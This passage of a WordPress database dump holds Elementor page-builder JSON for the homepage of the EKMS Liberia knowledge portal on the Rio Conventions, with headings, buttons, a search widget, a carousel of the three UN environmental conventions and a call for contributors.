fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(13162,2134,'_elementor_version','2.7.5'),(13163,2134,'_elementor_template_type','wp-page'),(13164,2134,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(13167,2135,'_wp_page_template','default'),(13168,2135,'_elementor_edit_mode','builder'),(13169,2135,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"slideshow\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"rgba(255,255,255,0.78)\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5500000000000000444089209850062616169452667236328125},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"background_slideshow_gallery\":[{\"id\":2035,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_epa.jpg\"},{\"id\":2036,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home1.jpg\"},{\"id\":2037,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home2.jpg\"},{\"id\":2038,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_home3.jpg\"},{\"id\":2039,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_maps.jpg\"}],\"background_slideshow_ken_burns_zoom_direction\":\"out\"},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25},\"typography_font_family\":\"Roboto\",\"typography_font_weight\":\"900\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The EKMS provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.<\\/p>\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":29,\"sizes\":[]},\"typography_font_weight\":\"900\",\"typography_font_family\":\"Roboto\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_type\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-on-biological-diversity\\/\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_fccc.jpg\",\"id\":1856},\"item_content_type\":\"default\",\"item_title\":\"UNFCCC\",\"item_text\":\"The United Nations Framework Convention on Climate Change\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-framework-convention-on-climate-change\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_ccd.jpg\",\"id\":1855},\"item_content_type\":\"default\",\"item_title\":\"UNCCD\",\"item_text\":\"The United Nations Convention to Combat Desertification\",\"item_link\":\"https:\\/\\/ekmsliberia.info\\/mea-resource\\/united-nations-convention-to-combat-desertification\\/\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"sarah\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_scroll\":\"3\",\"pause_on_hover\":\"true\",\"autoplay_speed\":2500,\"centered\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.40000000000000002220446049250313080847263336181640625,\"hover_opacity\":0.59999999999999997779553950749686919152736663818359375,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]},\"items_text_color\":\"#009ee2\",\"items_text_typography_typography\":\"custom\",\"items_text_typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"items_text_typography_font_weight\":\"700\",\"slides_to_show\":\"3\"},\"elements\":[],\"widgetType\":\"jet-carousel\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View All Agreements\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/multilateral-environmental-agreements\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the 